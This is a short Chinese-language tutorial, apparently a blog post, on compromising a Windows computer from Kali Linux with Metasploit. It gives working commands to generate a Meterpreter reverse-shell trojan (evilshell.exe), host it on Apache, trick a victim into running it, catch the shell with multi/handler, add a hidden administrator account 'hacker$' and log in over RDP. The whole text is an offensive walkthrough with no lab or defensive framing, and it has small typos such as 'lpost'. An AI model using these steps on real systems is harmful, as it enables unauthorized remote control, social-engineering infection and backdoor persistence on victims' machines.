一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。
其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。
二、步骤:
Step1:生成木马,msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=Kali的IP lport=5555 -f exe >/root/Desktop/evilshell.exe
-p 参数后跟上payload,攻击成功后要做什么事情
lhost 后跟监听的IP
lpost 后跟监听端口
-f 后跟要生成后门文件的类型
>重定向
Step2:将生成的木马文件evilshell.exe 拷贝到/var/www/html,开启apache服务,在肉鸡上打开浏览器,访问该站点(Kali的IP),下载木马文件。
cp evilshell.exe /var/www/html/
service apache2 start
Step3:开启MSF,提前查看postgresql运行状态 msfconsole
ps -aux |grep postgresql
msfconsole
exploits:开发利用,用来攻击某些服务、平台、系统等用到的工具
payload:载荷载体,攻击成功后要操作什么
输入以下命令
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp(选择木马时选的payload) msf5 exploit(multi/handler) > show options msf5 exploit(multi/handler) > set lhost kali的IP msf5 exploit(multi/handler) > set lpost 5555 msf5 exploit(multi/handler) > run(或者exploit)
Step4:在肉鸡中诱导用户点击exe程序(社会工程学攻击),在Kali中就会得到肉鸡的shell(meterpreter)
msf5 exploit(multi/handler) > run
Step5:现在就可以给肉鸡添加用户了
net user net user hacker$ /add net user hacker$ 123.com net localgroup administrators hacker$ /add 添加到管理员组 net user hacker$
Step6:远程登录肉鸡计算机
rdesktop + windows的IP
至此,使用Kali控制Windows成功!